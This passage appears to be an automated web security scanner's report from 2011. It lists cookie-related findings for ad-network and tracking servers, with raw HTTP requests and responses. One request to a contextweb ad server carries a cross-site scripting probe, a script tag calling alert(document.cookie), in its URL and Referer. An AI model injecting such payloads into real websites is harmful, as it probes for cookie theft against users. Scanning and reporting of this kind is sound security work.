<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:19:01 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:03 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:58:16 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:18 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:41 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O1012Mr|O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:43 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:10:47 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:49 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:14:54 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 573 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:56 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:28 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: OAX=rcHW801DO8gACNo5; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:29 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: OAX=rcHW801DO8kADVvc; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:32 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwJwO101yed8; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 500 Content-Type: application/x-javascript
document.write ('<!-- begin ZEDO for channel: Herald Interactive - ROS , publisher: Herald Interactive , Ad Dimension: Pixel/Popup - 1 x 1 -->\n'); document.write ('<iframe src="http://d3.zedo.com/jsc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:31:17 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1484 Content-Type: application/x-javascript
document.write ('<!-- begin ad tag-->\n'); document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.co ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:31:17 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: RMFD=011PiwJwO101yed8|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1415 Content-Type: application/x-javascript
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mmtnt.php HTTP/1.1 Host: syndication.mmismm.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: G=10120000000990801741
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:39 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV" Set-Cookie: G=10120000000990801741; expires=Fri, 29-Jan-2016 03:57:39 GMT; path=/; domain=.mmismm.com Content-Length: 462 Content-Type: text/javascript
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB23 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 2094 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Fri, 28 Jan 2011 17:37:49 GMT Connection: close Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sat, 28-Jan-2012 17:37:48 GMT; path=/ Set-Cookie: 513102_300X250_50151=1/28/2011 12:37:49 PM; domain=.contextweb.com; path=/ Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/
lm="28 Jan 2011 14:48:42 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
lm="28 Jan 2011 17:06:05 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /oz/sensor HTTP/1.1 Host: tap.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="28 Jan 2011 14:48:45 GMT"; ses15=7477^8; put_2132=D8DB51BF08484217F5D14AB47F4002AD; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1185=3011330574290390485; rdk15=0; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1; rdk=5804/7477; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3178300.js^1^1296232904^1296232904&3168345.js^1^1296232903^1296232903&3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; dq=15|4|11|0; put_1994=6ch47d7o8wtv; SERVERID=; put_2100=usr3fd748acf5bcab14; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; csi2=3174527.js^5^1296226121^1296232915&3138805.js^2^1296224077^1296226130&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rdk2=0; ses2=7477^9; cd=false;
Response
HTTP/1.1 204 No Content Date: Fri, 28 Jan 2011 17:06:05 GMT Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: Tue, 01 Jan 2008 00:12:30 GMT Cache-control: private Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/ Set-Cookie: dq=16|4|12|0; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/ Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/ Set-Cookie: lm="28 Jan 2011 17:06:05 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/ Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
var oo_profile={ tokenType : "0", tracking : "", tags : "Education,Beauty,Family and Parenting,Hobbies and Interests,Travel and Tourism High Affinity,Swing Voters", tagcloud : [ { tag ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt HTTP/1.1 Host: this.content.served.by.adshuffle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 01:41:09 GMT Location: http://search.mylife.com/wp-wsfy?s_cid=$208$DISd42f2251fd9347828c931695680ca71619a6ca0eeddb444d9be1d8e2a327f4b1 Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ac1=51f37.693f3=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:693F3_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sat, 29 Jan 2011 01:41:08 GMT Content-Length: 228 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:09 GMT;path=/
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://search.mylife.com/wp-wsfy?s_cid=$208$DISd42f2251fd9347828c931695680ca71619a6ca0eeddb444d9be1d8e2a327f4b1">here ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl?_ADTIME_ HTTP/1.1 Host: this.content.served.by.adshuffle.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html Expires: Sat, 29 Jan 2011 00:59:18 GMT Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sat, 29 Jan 2011 00:59:18 GMT Content-Length: 43 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:04:18 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt HTTP/1.1 Host: this.content.served.by.adshuffle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 01:41:08 GMT Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111939; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B69B_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sat, 29 Jan 2011 01:41:08 GMT Content-Length: 229 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e">her ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
